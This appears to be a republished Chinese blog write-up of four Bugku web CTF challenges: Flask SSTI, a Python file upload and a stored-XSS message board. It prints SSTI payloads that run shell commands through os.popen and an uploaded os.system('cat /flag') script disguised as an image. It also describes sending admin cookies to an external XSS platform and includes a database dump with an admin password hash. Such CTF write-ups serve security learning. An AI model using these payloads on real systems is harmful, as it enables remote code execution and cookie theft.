当前位置: 首页 > news >正文

[Bugku] web-CTF靶场详解!!!

            平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。

           平台有题库、赛事预告、工具库、Writeup库等模块。

-------------------------------

Simple_SSTI_1

                         启动环境:

               

              页面提示传入参数flag 

 

           F12查看源码得到第二个提示

      SECRET_KEY(秘钥)是Flask中重要的一个配置值,在这题,构造语句查看它,得到flag

      SECRET_KEY(秘钥)是Flask中重要的一个配置值,在这题,构造语句查看它,得到flag

-------------------------------------------------

Simple_SSTI_2

                         启动环境:

   页面提示传入参数flag 

             f12查看源码,发现没有提示信息。

            

           通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件(读取网站系统目录),发现如下的文件夹:

           通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 

            通过{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}读取flag内容,读取flag内容,最终得到flag 

 

----------------------------------------

Flask_FileUpload

                                启动环境:

           发现是上传文件

        随便找张图片上传试试 

     查看源代码f12进入    注释告诉我们,会运行python的文件

     根据需求,编写代码  写一个python代码改成jpg或者png格式的文件

import os
os.system('cat /flag')

 

  上传 看看     在元素中即可查看flag

 

----------------------------------------

留言板:

              开启环境:

提示需登录后台,需要使用python平台接收flag

打开场景后,出现了下面的界面。

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies
  • 测试一下script代码:

          发现确实可以读取到。

         使用目录扫描工具-御剑进行扫描试试

        得到后台管理地址:/admin.php 

          账号密码不知道?
          需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
           所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。

           将项目中提供的代码输入留言板中:

 在查看扫描出来的db.sql(本人没扫出来)不知道他们怎么扫出来的

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)/*!40101 SET NAMES utf8 */;#
# Structure for table "text"
#CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (`Id` int(11) NOT NULL AUTO_INCREMENT,`text` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "text"
#/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;#
# Structure for table "user"
#DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (`Id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) DEFAULT NULL,`password` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "user"
#/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

  

           底部存在一组 user passwd

 

         尝试解码登录

      反射我们刚刚xss语句,我们在回到xss平台获得信息

       查看获得cookie,flag加密信息,解码获得flag

-------------------------------------------

滑稽:

                    开启环境:

                打开为以下界面

           查看源代码 获得flag

http://www.lryc.cn/news/411478.html

相关文章:

  • 系统架构师(每日一练11)
  • 【前端】fis框架学习
  • STM32高级运动控制系统教程
  • 链式栈,队列与树形结构
  • Android历史版本与APK文件结构
  • 文件解析漏洞集合
  • 如何利用大语言模型进行半监督医学图像分割?这篇文章给出了答案
  • 库文件的制作和makefile文件操作基础实现
  • 【Linux】进程创建进程终止进程等待
  • 编程的进阶和并发之路
  • 文件系统 --- 文件结构体,文件fd以及文件描述符表
  • 【第三节】python中的函数
  • “论云原生架构及其应用”写作框架软考高级论文系统架构设计师论文
  • 深度剖析Google黑科技RB-Modulation:告别繁琐训练,拥抱无限创意生成和风格迁移!
  • react native 和 flutter 区别
  • ITSS服务经理/ITSS服务工程师,招投标需要准备吗?
  • eleven接口、多态
  • 重磅惊喜!OpenAI突然上线GPT-4o超长输出模型!「Her」高级语音模式已开放测试
  • 解决问题 CUDA error: CUBLAS_STATUS_INVALID_VALUE when calling `cublasGemmEx
  • 【Python实战因果推断】67_图因果模型2
  • RK3588+MIPI+GMSL+AI摄像机:自动车载4/8通道GMSL采集/边缘计算盒解决方案
  • 智云-一个抓取web流量的轻量级蜜罐
  • 面向对象程序设计之sort排序
  • ARM学习(29)NXP 双coreMCU MCXN94学习
  • 视频剪辑免费素材哪里能找到?
  • 多线程为什么是你必需要掌握的知识
  • 转转上门履约服务拆分库表迁移实践
  • upload-labs 1-19关 攻略 附带项目下载地址 小白也能看会
  • 如何设置SQL Server的端口:详细步骤指南
  • 昇思25天学习打卡营第16天|Diffusion扩散模型,DCGAN生成漫画头像